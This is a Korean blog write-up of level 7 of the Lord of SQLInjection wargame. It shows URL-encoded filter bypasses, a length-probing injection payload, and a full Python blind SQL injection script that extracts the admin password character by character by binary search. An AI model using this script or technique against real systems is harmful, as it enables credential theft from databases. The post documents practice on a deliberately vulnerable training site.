[LOS] Lord of SQLinjection 7번

2022. 10. 23. 00:11·Play/wargame

- ()필터링

- 그냥 참고로 말하자면 ()는 %28 %29

- URL에 && 입력하니 씹힘 > %26

- URL에 #입력하니 무시당하길래 %23사용

 

?pw='||id='admin'%26%26length(pw)=1%23

pw길이 맞추기. 1부터 8까지 시도

length(pw)=8

 

 

이제 코드를 짜보자.

import requests

url = "https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php"
cookie = {"PHPSESSID": "세션"}

def pw_find():
    length = 8
    pw = ""
    for i in range(length):
        start_num = 1
        end_num = 127
        value = 64
        while True:
            param = {
                "pw": "'||id='admin' && ascii(substring(pw,{},1))= {} #".format(
                    i + 1, value
                )
            }
            print(param)
            req = requests.get(url, params=param, cookies=cookie)
            if "Hello admin" in req.text:
                pw += chr(value)
                break
            else:
                param = {
                    "pw": "'||id='admin' && ascii(substring(pw,{},1)) > {} #".format(
                        i + 1, value
                    )
                }
                req = requests.get(url, params=param, cookies=cookie)
                if "Hello admin" in req.text:
                    start_num = value
                    value = (value + end_num) // 2
                else:
                    end_num = value
                    value = (start_num + value) // 2
    print("password: ", pw)

pw_find()

코드에 &&랑 #입력한건 정상적으로 작동함

ㅇㅋ

이제 pw에 찾은 문자열 입력하면 클리어

저작자표시 (새창열림)

'Play > wargame' 카테고리의 다른 글

[LOS] Load of SQLInjection 12번 풀이  (5) 2022.10.25
[LOS] Load of SQLInjection 10번  (0) 2022.10.24
webhacking.kr 6번 - base64  (0) 2022.10.18
(webhacking.kr 2번) 해도 해도 헷갈리는 Blind SQLInjection  (4) 2022.10.11
[LOS] Lord of SQLinjection 1~4 문풀 정리  (0) 2022.10.04
'Play/wargame' 카테고리의 다른 글
  • [LOS] Load of SQLInjection 12번 풀이
  • [LOS] Load of SQLInjection 10번
  • webhacking.kr 6번 - base64
  • (webhacking.kr 2번) 해도 해도 헷갈리는 Blind SQLInjection
병뚜
병뚜
열정!
  • 병뚜
    열려라 뚜껑
    병뚜
  • 전체
    오늘
    어제
    • all (372)
      • 일상X사랑X돈 (0)
        • 보안이슈 (114)
        • 뜨거운감자 (9)
        • 맛집 (2)
        • 혼잣말 (16)
      • 보안 (87)
        • 웹·모바일 (46)
        • 인프라 (19)
        • 리버싱 (8)
        • Security-Gym (10)
        • 리뷰 (4)
      • 프로그래밍 (66)
        • python (14)
        • java (12)
        • js (40)
      • System (47)
        • OS (14)
        • 침투 (33)
      • Play (20)
        • wargame (20)
      • 기타 (10)
  • 블로그 메뉴

    • 홈
    • 태그
    • 방명록
  • 링크

  • 공지사항

  • 인기 글

  • 태그

    파이썬입문
    드림핵리버싱
    jwt
    악성코드
    파이썬공부
    보안뉴스
    IT뉴스
    혼공
    kisa
    랜섬웨어
    혼자공부하는파이썬
    보안이슈
    정보보안교육
    커널디버깅
    정보보안
    windows internals
    프로세스
    파이썬
    혼공파
    혼공학습단
    자바스크립트 상속
    정보보호
    뉴스요약
    it이슈
    윈도우인터널스
    리버싱
    혼공단
    파이썬초보
    공급망공격
    리버싱초보
  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.3
병뚜
[LOS] Lord of SQLinjection 7번
상단으로

티스토리툴바